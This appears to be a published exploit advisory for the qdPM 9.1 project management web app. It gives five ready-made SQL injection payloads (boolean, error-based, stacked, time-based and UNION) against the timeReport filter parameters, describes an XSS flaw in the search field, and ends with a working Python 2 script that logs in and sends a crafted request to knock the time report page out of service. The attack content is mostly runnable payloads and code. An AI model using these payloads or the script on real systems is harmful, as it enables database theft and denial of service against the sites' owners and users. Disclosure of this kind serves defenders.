Pentest Blog - Self-Improvement to Ethical Hacking

# Exploit Title: qdPM 9.1 - Multiple Vulnerabilities
# Date: 2018-11-01
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software description:
# Free project management tool for small team
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.
################################################################
# Vulnerabilities:
# The application accommodates 3 different vulnerabilities.
# SQL Injection - Cross-Site Scripting and Denial of Service.
################################################################
# POC 1 : SQL Inection :
# An attacker can gain access to all the database information using filter_by[CommentCreatedFrom]
# and filter_by[5BCommentCreatedTo] parameters.
#
# Parameter: filter_by[CommentCreatedFrom] and filter_by[5BCommentCreatedTo](POST)
# Request URL: /index.php/timeReport
#
#    Type: boolean-based blind
#    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30") RLIKE (SELECT (CASE WHEN (7166=7166) THEN #0x323031382d31302d3330 ELSE 0x28 END)) AND ("votm"="votm&filter_by[CommentCreatedTo]=2018-10-17
#
#    Type: error-based
#    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30") AND EXTRACTVALUE(2944,CONCAT(0x5c,0x716a766b71,(SELECT #(ELT(2944=2944,1))),0x7178717871)) AND ("ilfY"="ilfY&filter_by[CommentCreatedTo]=2018-10-17
#
#    Type: stacked queries
#    Title: MySQL > 5.0.11 stacked queries (comment)
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30");SELECT SLEEP(5)#&filter_by[CommentCreatedTo]=2018-10-17
#
#    Type: AND/OR time-based blind
#    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30") AND 2173=BENCHMARK(5000000,MD5(0x7652785a)) AND #("PRig"="PRig&filter_by[CommentCreatedTo]=2018-10-17
#
#    Type: UNION query
#    Title: Generic UNION query (NULL) - 40 columns
#    Payload: filter_by[CommentCreatedFrom]=2018-10-30") UNION ALL SELECT #33,33,33,33,33,33,33,33,33,33,CONCAT(0x716a766b71,0x474b474f65666b437365466773655373776743495a75536670676f41445249514775775a6f4d6a63,0x7178717871),#33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33-- #pqmn&filter_by[CommentCreatedTo]=2018-10-17
#---
################################################################
# POC 2 : Cross-Site Scripting :
# Almost all pages have a vulnerablity in the "Search" input field in the upper right corner.
# Navigate to "Search" and put xss payload.
# You will have an alert box in the page.
################################################################
# POC 3 : Denial of Service :
# There is DOS vulnerablity in the time reports page.
# You can send more data than the amount of bytes allowed over filter_by[CommentCreatedFrom]
# and filter_by[5BCommentCreatedTo] parameters in which time intervals are specified.
# When the high byte of data has been sent, "timeReport" fall into the
# Fatal error page and the page can not be used for a long time.
# You can use the following python codes for exploit.
################################################################

----- python script -----
#!/usr/bin/python

import re, mechanize
import urllib, sys
import cookielib
 
print "\n[*] qdPM v.9.1 - Denial of Service"
print "[*] Vulnerability discovered by AkkuS"
print "[*] My Blog - https://www.pentest.com.tr\n"
if (len(sys.argv) != 2):
    print "[*] Usage: poc.py "
    exit(0)
 
rhost = sys.argv[1]

# Input
UserMail = str(raw_input("User Mail: "))
Password = str(raw_input("Password: "))
 
# Login into site
print "[*] Loging in..."
br = mechanize.Browser()
br.set_handle_robots(False)

# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

br.open("http://"+rhost+"/index.php/login")
assert br.viewing_html()
br.select_form(name="loginForm")
br.select_form(nr=0)
br.form['login[email]'] = UserMail
br.form['login[password]'] = Password
br.submit()

title = br.title()
print "You are in "+title+" now"

data = urllib.urlencode({'filter_by[CommentCreatedFrom]':'2018-10-30 ) RLIKE (SELECT (CASE WHEN (7166=7166) THEN 0x323031382d31302d3330 ELSE 0x28 END)) AND (votm','filter_by[CommentCreatedTo]':'foo'})
r = br.open("http://"+rhost+"/index.php/timeReport", data)

# If you get a fatal Error, the DOS operation is successful. User cannot use time reports anymore.
print "[*] ===== Response ===== "

print r.read()   

print "[*] ==================== "